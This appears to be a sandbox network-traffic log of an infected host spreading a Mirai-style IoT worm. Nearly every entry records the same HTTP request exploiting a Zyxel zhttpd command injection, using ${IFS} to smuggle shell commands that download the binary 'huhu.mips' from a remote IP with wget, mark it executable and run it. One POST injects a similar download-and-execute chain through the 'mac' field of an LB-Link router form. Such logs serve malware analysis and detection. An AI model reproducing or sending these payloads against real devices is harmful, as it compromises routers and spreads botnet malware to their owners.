                                      Jan 19, 2024 17:29:23.602088928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2387192.168.2.1441872138.253.112.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602128983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2388192.168.2.1436096101.36.115.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602157116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2389192.168.2.1449534102.5.243.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602194071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2390192.168.2.1447492185.186.124.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602217913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2391192.168.2.1446172149.8.215.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602251053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2392192.168.2.143307473.142.155.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602309942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2393192.168.2.1455784138.161.38.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602334023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2394192.168.2.1435498105.96.217.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602380991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2395192.168.2.1448620146.169.212.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602420092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2396192.168.2.145503468.124.29.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602462053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2397192.168.2.1439648191.26.156.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602508068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2398192.168.2.1454410141.135.107.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602539062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2399192.168.2.1450666111.180.105.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602581978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2400192.168.2.1447970115.215.201.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602622032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2401192.168.2.1448480213.254.70.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602660894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2402192.168.2.1450916188.212.217.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602680922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2403192.168.2.1460650136.214.228.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602715015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2404192.168.2.145242054.109.208.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602755070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2405192.168.2.1435690208.44.97.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602794886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2406192.168.2.1443724173.155.148.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602821112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2407192.168.2.1441542198.45.129.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602866888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2408192.168.2.143816683.173.25.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602885962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2409192.168.2.14598248.252.254.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602931023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2410192.168.2.1440940150.234.192.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602967024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2411192.168.2.14449005.35.214.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.603008986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2412192.168.2.1438916160.128.221.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.603039026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2413192.168.2.1451616126.179.143.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.603077888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2414192.168.2.1443134111.188.23.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.603140116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2415192.168.2.1457842157.167.143.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.603180885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2416192.168.2.1441064148.11.243.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.603213072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2417192.168.2.1440784104.192.9.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.606118917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2418192.168.2.1458900202.242.223.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.606683016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2419192.168.2.1450286157.65.20.1488080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.592883110 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:24.867849112 CET404INHTTP/1.1 400 Bad Request
                                      Date: Fri, 19 Jan 2024 16:29:24 GMT
                                      Server: Apache
                                      Content-Length: 226
                                      Connection: close
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2420192.168.2.1449510184.70.29.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612231016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2421192.168.2.1441766152.121.158.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612339020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2422192.168.2.1447996124.23.0.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612436056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2423192.168.2.145336870.25.71.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612468958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2424192.168.2.1447830181.213.39.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612515926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2425192.168.2.1447360181.61.190.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612557888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2426192.168.2.143861473.117.27.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612598896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2427192.168.2.144339825.35.136.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612633944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2428192.168.2.145020227.161.95.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612683058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2429192.168.2.144353878.158.210.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612728119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2430192.168.2.1453878130.235.29.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612766027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2431192.168.2.1434172145.162.224.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612818956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2432192.168.2.143508214.23.29.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612862110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2433192.168.2.1452564120.223.4.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612894058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2434192.168.2.145898466.165.43.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612926960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2435192.168.2.143925453.94.76.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.612999916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2436192.168.2.1438946192.213.170.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613030910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2437192.168.2.1452448186.241.142.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613060951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2438192.168.2.143379627.96.12.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613090038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2439192.168.2.144810812.160.1.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613133907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2440192.168.2.144828017.195.217.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613173008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2441192.168.2.143923294.62.245.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613218069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2442192.168.2.1450354187.82.163.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613276005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2443192.168.2.144216018.131.25.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613318920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2444192.168.2.1441128213.243.123.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.613362074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2445192.168.2.1458590221.156.82.63443
                                      TimestampBytes transferredDirectionData
